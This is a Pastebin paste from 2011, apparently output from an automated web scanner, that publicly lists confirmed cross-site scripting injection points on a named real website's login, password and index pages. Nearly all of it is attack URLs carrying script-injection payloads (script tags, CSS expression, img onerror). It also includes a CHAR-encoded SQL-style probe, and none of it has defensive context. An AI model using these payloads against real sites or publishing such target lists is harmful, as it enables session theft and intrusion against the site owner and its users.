Advertisement
sroub3k

missagro.cz

Dec 31st, 2011
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.06 KB | None | 0 0
  1. XSS - http://missagro.cz
  2.  
  3. http://www.missagro.cz/underwood/login.php?'"--></style></script><script>alert(0x0002CB)</script>
  4. http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000497)</script>
  5. http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000491)</script>&uwLanguage=cz
  6. http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request='"--></style></script><script>alert(0x0004D4)</script>&uwLanguage=cz
  7. http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=" stYle="x:expre/**/ssion(alert(9)) &uwLanguage=cz
  8. http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=/underwood/&uwLanguage="></script><script>alert(9)</script>
  9. http://www.missagro.cz/underwood/login.php/' stYle='x:expre/**/ssion(alert(9))
  10. http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=/underwood/&uwLanguage='"--></style></script><script>alert(0x00054F)</script>
  11. http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000551)</script>&uwLanguage=cz
  12. http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000559)</script>
  13. http://www.missagro.cz/underwood/passwd.php?changeUwLanguage=1&request=3&uwLanguage="></script><script>alert(9)</script>
  14. http://www.missagro.cz/underwood/passwd.php/"ns="alert(0x000464)
  15. http://www.missagro.cz/underwood/passwd.php?'"--></style></script><script>alert(0x0005E1)</script>
  16.  
  17. Severity : Important
  18. Confirmation : Confirmed
  19. Detection Accuracy :
  20. Vulnerable URL : http://www.missagro.cz/underwood/login.php
  21. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  22. Parameter Name: loginTarget
  23. Parameter Type: Post
  24. Attack Pattern: ><iMg src=N onerror=alert(9)>
  25.  
  26. |||
  27.  
  28. [Possible] Permanent Cross-site Scripting
  29.  
  30. Severity : Important
  31. Confirmation : Confirmed
  32. Detection Accuracy :
  33. Vulnerable URL : http://www.missagro.cz/underwood/login.php?request=3&uwLanguage=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
  34. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  35. Injection URL: http://www.missagro.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage=%27%22%20ns=netsparker(0x0004DF)%20
  36. Parameter Name: uwLanguage
  37. Parameter Type: Querystring
  38. Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
  39.  
  40. |||
  41.  
  42. [Possible] Cross-site Scripting
  43.  
  44. http://www.missagro.cz/underwood/?'"--></style></script><script>alert(0x0002CB)</script>
  45. http://www.missagro.cz/underwood/?'"--></style></script><script>alert(0x0002CB)</script>
  46. http://www.missagro.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage='"--></style></script><script>alert(0x0004A0)</script>
  47. http://www.missagro.cz/underwood/index.php/" stYle="x:expre/**/ssion(alert(9))
  48. http://www.missagro.cz/underwood/index.php?'"--></style></script><script>alert(0x00055A)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement